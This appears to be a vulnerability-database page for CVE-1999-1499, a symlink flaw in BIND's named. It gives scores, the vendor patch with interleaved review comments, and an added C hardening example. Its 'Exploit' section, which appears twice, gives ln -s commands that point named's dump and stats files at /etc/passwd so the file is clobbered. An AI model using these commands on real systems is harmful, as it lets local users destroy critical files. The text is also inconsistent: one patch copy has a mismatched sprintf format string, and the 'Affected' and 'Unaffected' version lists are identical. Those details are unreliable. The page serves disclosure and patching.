CVE-1999-1499
CVSS 2.1
Published: 1998-04-10 00:00:00
Revised: 2008-09-05 16:19:40

[Original] named in ISC BIND 4.9 and 8.1 allows local users to destroy files via a symlink attack on (1) named_dump.db when root kills the process with a SIGINT, or (2) named.stats when SIGIOT is used.


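[CNNVD] SIGINT, SIGIO ISC BIND symlink vulnerability (CNNVD-199804-022)

        named in ISC BIND 4.9 and 8.1 contains a vulnerability. Local users can destroy files via a symlink attack on (1) named_dump.db when root kills the process with a SIGINT, or (2) named.stats when SIGIOT is used.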

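- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on the availability of the system]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:isc:bind:8.1 ISC BIND 8.1
cpe:/a:isc:bind:4.9 ISC BIND 4.9

- OVAL (technical details for detection)

No related OVAL definitions found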

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1499
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1499
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199804-022
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/80
(VENDOR_ADVISORY)  BID  80
http://www.securityfocus.com/archive/1/8966
(VENDOR_ADVISORY)  BUGTRAQ  19980410 BIND 4.9.7 named follows symlinks, clobbers anything

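- Vulnerability information

SIGINT, SIGIO ISC BIND symlink vulnerability
Low risk  Other
1998-04-10 00:00:00 2005-10-20 00:00:00
Local
        named in ISC BIND 4.9 and 8.1 contains a vulnerability. Local users can destroy files via a symlink attack on (1) named_dump.db when root kills the process with a SIGINT, or (2) named.stats when SIGIOT is used.

- Advisories and patches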

        Upgrade to BIND 4.9.7, BIND 8.1.x or apply the following
        patch.
        *** named/ns_init.c.000 Mon Jun 2 06:34:35 1997
        --- named/ns_init.c Sun Apr 12 13:12:05 1998
        ***************
        *** 560,567 ****
         * We will always transfer this zone again
         * after a reload.
         */
        ! sprintf(buf, "/NsTmp%ld.%d", _PATH_TMPDIR,
        ! (long)getpid(), tmpnum++);
         source = savestr(buf);
         zp->z_flags |= Z_TMP_FILE;
         } else
        --- 560,567 ----
         * We will always transfer this zone again
         * after a reload.
         */
        ! sprintf(buf, "NsTmp%ld.%d", (long)getpid(),
        ! tmpnum++);
         source = savestr(buf);
         zp->z_flags |= Z_TMP_FILE;
         } else
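Review bot: In the new `sprintf(buf, "NsTmp%ld.%d", (long)getpid(), tmpnum++)` the temporary name is still predictable (pid plus a counter) and is now resolved against the process's current directory, so the change is only safe if that directory is writable by named alone. Please say so in the comment above the call, and make sure the place where `source` is later opened uses an exclusive create (`O_CREAT|O_EXCL`) so a name that already exists is never reused.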
        *** named/ns_main.c.000 Mon Jun 2 06:34:36 1997
        --- named/ns_main.c Sun Apr 12 14:51:45 1998
        ***************
        *** 1463,1469 ****
         dprintf(1, (ddt, "sigprof()\n"));
         if (fork() == 0)
         {
        - (void) chdir(_PATH_TMPDIR);
         exit(1);
         }
         errno = save_errno;
        --- 1463,1468 ----
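Review bot: With `(void) chdir(_PATH_TMPDIR);` removed, the child forked after the `sigprof()` debug line now exits in whatever directory the daemon happens to be running in, and nothing in this hunk documents which directory that is expected to be. Add a one-line comment naming the expected working directory; separately, the child's `exit(1)` would be safer as `_exit(1)` so it does not flush stdio buffers inherited from the parent.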
        *** named/pathnames.h.000 Thu Dec 15 17:24:22 1994
        --- named/pathnames.h Sat Apr 11 10:57:45 1998
        ***************
        *** 74,88 ****
         #ifndef _PATH_XFER
         # define _PATH_XFER "/usr/libexec/named-xfer"
         #endif
        ! #define _PATH_DEBUG "/var/tmp/named.run"
        ! #define _PATH_DUMPFILE "/var/tmp/named_dump.db"
         #ifndef _PATH_PIDFILE
         # define _PATH_PIDFILE "/var/run/named.pid"
         #endif
        ! #define _PATH_STATS "/var/tmp/named.stats"
        ! #define _PATH_XFERTRACE "/var/tmp/xfer.trace"
        ! #define _PATH_XFERDDT "/var/tmp/xfer.ddt"
        ! #define _PATH_TMPXFER "/var/tmp/xfer.ddt.XXXXXX"
         #define _PATH_TMPDIR "/var/tmp"
         #else /* BSD */
        --- 74,88 ----
         #ifndef _PATH_XFER
         # define _PATH_XFER "/usr/libexec/named-xfer"
         #endif
        ! #define _PATH_DEBUG "named.run"
        ! #define _PATH_DUMPFILE "named_dump.db"
         #ifndef _PATH_PIDFILE
         # define _PATH_PIDFILE "/var/run/named.pid"
         #endif
        ! #define _PATH_STATS "named.stats"
        ! #define _PATH_XFERTRACE "xfer.trace"
        ! #define _PATH_XFERDDT "xfer.ddt"
        ! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
         #define _PATH_TMPDIR "/var/tmp"
         #else /* BSD */
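Review bot: `_PATH_DEBUG`, `_PATH_DUMPFILE`, `_PATH_STATS` and the xfer macros become bare file names here, so where the files land depends entirely on the daemon's working directory, and as far as this patch shows the opens themselves still follow symlinks. Document next to these defines that the working directory must not be writable by other users, and consider `O_NOFOLLOW` or `O_EXCL` at the open sites as a second layer.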
        ***************
        *** 92,106 ****
         #ifndef _PATH_XFER
         # define _PATH_XFER "/etc/named-xfer"
         #endif
        ! #define _PATH_DEBUG "/usr/tmp/named.run"
        ! #define _PATH_DUMPFILE "/usr/tmp/named_dump.db"
         #ifndef _PATH_PIDFILE
         # define _PATH_PIDFILE "/etc/named.pid"
         #endif
        ! #define _PATH_STATS "/usr/tmp/named.stats"
        ! #define _PATH_XFERTRACE "/usr/tmp/xfer.trace"
        ! #define _PATH_XFERDDT "/usr/tmp/xfer.ddt"
        ! #define _PATH_TMPXFER "/usr/tmp/xfer.ddt.XXXXXX"
         #define _PATH_TMPDIR "/usr/tmp"
         #endif /* BSD */
        --- 92,106 ----
         #ifndef _PATH_XFER
         # define _PATH_XFER "/etc/named-xfer"
         #endif
        ! #define _PATH_DEBUG "named.run"
        ! #define _PATH_DUMPFILE "named_dump.db"
         #ifndef _PATH_PIDFILE
         # define _PATH_PIDFILE "/etc/named.pid"
         #endif
        ! #define _PATH_STATS "named.stats"
        ! #define _PATH_XFERTRACE "xfer.trace"
        ! #define _PATH_XFERDDT "xfer.ddt"
        ! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
         #define _PATH_TMPDIR "/usr/tmp"
         #endif /* BSD */
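Review bot: `_PATH_TMPDIR` stays defined in both branches of pathnames.h although the two uses visible in this patch, in ns_init.c and ns_main.c, are removed. If no other caller remains, drop the macro so nothing new starts writing into the shared directory again; if one does remain, it needs the same relative-path treatment as the defines changed here.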

- Vulnerability information (19072)

ISC BIND 4.9.7 -T1B named SIGINT and SIGIOT symlink Vulnerability (EDBID:19072)
linux local
1998-04-10 Verified
0 Joe H
N/A [click to download]
source: http://www.securityfocus.com/bid/80/info

The named daemon will dump the named database to /var/tmp/named_dump.db
when it receives a SIGINT signal. It does not check for symbolic links while
doing so and can be made to overwrite any file in the system.

The named daemon will append named statistics to /var/tmp/named.stats
when it receives a SIGIOT signal. It does not check for symbolic links while
doing so and can be made to append to any file in the system.

BIND 8.1.x is not vulnerable as it uses a private directory specified in
named.{boot,conf} for temporary and debug dumps.

$ ls -l /var/tmp/named_dump.db
/var/tmp/named_dump.db not found
$ ls -l /var/tmp/named.stats
/var/tmp/named.stats not found
$ ln -s /etc/passwd /var/tmp/named_dump.db
$ ln -s /etc/passwd /var/tmp/named.stats

[ wait for root to send a SIGINT or SIGIOT to named ]		

- Vulnerability information

59272
ISC BIND named Multiple Symlink Arbitrary File Overwrite
Local Access Required Input Manipulation, Race Condition
Loss of Integrity Patch / RCS, Upgrade
Vendor Verified

- Vulnerability description

- Timeline

1998-04-10 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.9.7, 8.1.x, or higher, as it has been reported to fix this vulnerability. In addition, a patch has been released for some older versions.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

ISC BIND named SIGINT and SIGIOT symlink Vulnerability
Access Validation Error 80
No No
1998-04-10 12:00:00 2009-07-11 12:16:00
Made public in "BIND 4.9.7 named follows symlinks, clobbers anything." by Joe H. <joe@blarg.net> to BugTraq on April 10, 1998.

- Affected versions

ISC BIND 4.9.7 -T1B
ISC BIND 8.1.2
+ HP HP-UX 11.11
+ HP HP-UX 11.0
ISC BIND 8.1.1
ISC BIND 8.1
ISC BIND 4.9.7
+ HP HP-UX 11.0 4
+ HP HP-UX 11.0
+ HP HP-UX 10.24
+ HP HP-UX 10.20
+ HP HP-UX 10.10

- Unaffected versions

ISC BIND 8.1.2
+ HP HP-UX 11.11
+ HP HP-UX 11.0
ISC BIND 8.1.1
ISC BIND 8.1
ISC BIND 4.9.7
+ HP HP-UX 11.0 4
+ HP HP-UX 11.0
+ HP HP-UX 10.24
+ HP HP-UX 10.20
+ HP HP-UX 10.10

- Discussion

The named daemon will dump the named database to /var/tmp/named_dump.db
when it receives a SIGINT signal. It does not check for symbolic links while
doing so and can be made to overwrite any file in the system.

The named daemon will append named statistics to /var/tmp/named.stats
when it receives a SIGIOT signal. It does not check for symbolic links while
doing so and can be made to append to any file in the system.

BIND 8.1.x is not vulnerable as it uses a private directory specified in
named.{boot,conf} for temporary and debug dumps.
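
The missing check described above, as an added C example (not BIND's code and not the vendor patch, which instead moves the files to relative paths). `open_dump_nofollow` and `demo_symlink_refused` are hypothetical names, and the scenario runs in a scratch directory the code creates itself.

```c
#define _POSIX_C_SOURCE 200809L   /* O_NOFOLLOW, mkdtemp */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not a BIND function: open a dump/stats file for
 * truncating write (append == 0) or append, refusing symlinks. */
int open_dump_nofollow(const char *path, int append)
{
    struct stat st;
    int flags = O_WRONLY | O_CREAT | O_NOFOLLOW | (append ? O_APPEND : 0);
    int fd = open(path, flags, 0600);  /* ELOOP if the last component is a symlink */
    if (fd < 0)
        return -1;
    /* Check the object actually opened (no lstat/open race); truncate only
     * after it passes, so a rejected file is never emptied. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        (!append && ftruncate(fd, 0) != 0)) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: 1 if a planted link is refused with its target intact. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/nsdemoXXXXXX", victim[64], dump[64];
    struct stat st;
    int fd, refused, fresh;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(dump, sizeof dump, "%s/named_dump.db", dir);
    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "keep", 4) != 4 || close(fd) != 0 ||
        symlink(victim, dump) != 0)
        return 0;
    refused = open_dump_nofollow(dump, 0) == -1 &&
              stat(victim, &st) == 0 && st.st_size == 4;
    unlink(dump);                      /* remove the planted link */
    fd = open_dump_nofollow(dump, 1);  /* now creates a regular file */
    fresh = fd >= 0 && close(fd) == 0;
    unlink(dump); unlink(victim); rmdir(dir);
    return refused && fresh;
}

int main(void) { return demo_symlink_refused() ? 0 : 1; }
```

`O_NOFOLLOW` only guards the final path component, so a private, non-world-writable directory remains the primary fix.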

- Exploit

$ ls -l /var/tmp/named_dump.db
/var/tmp/named_dump.db not found
$ ls -l /var/tmp/named.stats
/var/tmp/named.stats not found
$ ln -s /etc/passwd /var/tmp/named_dump.db
$ ln -s /etc/passwd /var/tmp/named.stats

[ wait for root to send a SIGINT or SIGIOT to named ]

- Solution

Upgrade to BIND 4.9.7, BIND 8.1.x or apply the following
patch.

*** named/ns_init.c.000 Mon Jun 2 06:34:35 1997
--- named/ns_init.c Sun Apr 12 13:12:05 1998
***************
*** 560,567 ****
* We will always transfer this zone again
* after a reload.
*/
! sprintf(buf, "%s/NsTmp%ld.%d", _PATH_TMPDIR,
! (long)getpid(), tmpnum++);
source = savestr(buf);
zp->z_flags |= Z_TMP_FILE;
} else
--- 560,567 ----
* We will always transfer this zone again
* after a reload.
*/
! sprintf(buf, "NsTmp%ld.%d", (long)getpid(),
! tmpnum++);
source = savestr(buf);
zp->z_flags |= Z_TMP_FILE;
} else
*** named/ns_main.c.000 Mon Jun 2 06:34:36 1997
--- named/ns_main.c Sun Apr 12 14:51:45 1998
***************
*** 1463,1469 ****
dprintf(1, (ddt, "sigprof()\n"));
if (fork() == 0)
{
- (void) chdir(_PATH_TMPDIR);
exit(1);
}
errno = save_errno;
--- 1463,1468 ----
*** named/pathnames.h.000 Thu Dec 15 17:24:22 1994
--- named/pathnames.h Sat Apr 11 10:57:45 1998
***************
*** 74,88 ****
#ifndef _PATH_XFER
# define _PATH_XFER "/usr/libexec/named-xfer"
#endif
! #define _PATH_DEBUG "/var/tmp/named.run"
! #define _PATH_DUMPFILE "/var/tmp/named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/var/run/named.pid"
#endif
! #define _PATH_STATS "/var/tmp/named.stats"
! #define _PATH_XFERTRACE "/var/tmp/xfer.trace"
! #define _PATH_XFERDDT "/var/tmp/xfer.ddt"
! #define _PATH_TMPXFER "/var/tmp/xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/var/tmp"

#else /* BSD */
--- 74,88 ----
#ifndef _PATH_XFER
# define _PATH_XFER "/usr/libexec/named-xfer"
#endif
! #define _PATH_DEBUG "named.run"
! #define _PATH_DUMPFILE "named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/var/run/named.pid"
#endif
! #define _PATH_STATS "named.stats"
! #define _PATH_XFERTRACE "xfer.trace"
! #define _PATH_XFERDDT "xfer.ddt"
! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/var/tmp"

#else /* BSD */
***************
*** 92,106 ****
#ifndef _PATH_XFER
# define _PATH_XFER "/etc/named-xfer"
#endif
! #define _PATH_DEBUG "/usr/tmp/named.run"
! #define _PATH_DUMPFILE "/usr/tmp/named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/etc/named.pid"
#endif
! #define _PATH_STATS "/usr/tmp/named.stats"
! #define _PATH_XFERTRACE "/usr/tmp/xfer.trace"
! #define _PATH_XFERDDT "/usr/tmp/xfer.ddt"
! #define _PATH_TMPXFER "/usr/tmp/xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/usr/tmp"
#endif /* BSD */

--- 92,106 ----
#ifndef _PATH_XFER
# define _PATH_XFER "/etc/named-xfer"
#endif
! #define _PATH_DEBUG "named.run"
! #define _PATH_DUMPFILE "named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/etc/named.pid"
#endif
! #define _PATH_STATS "named.stats"
! #define _PATH_XFERTRACE "xfer.trace"
! #define _PATH_XFERDDT "xfer.ddt"
! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/usr/tmp"
#endif /* BSD */

- Related references

     

     
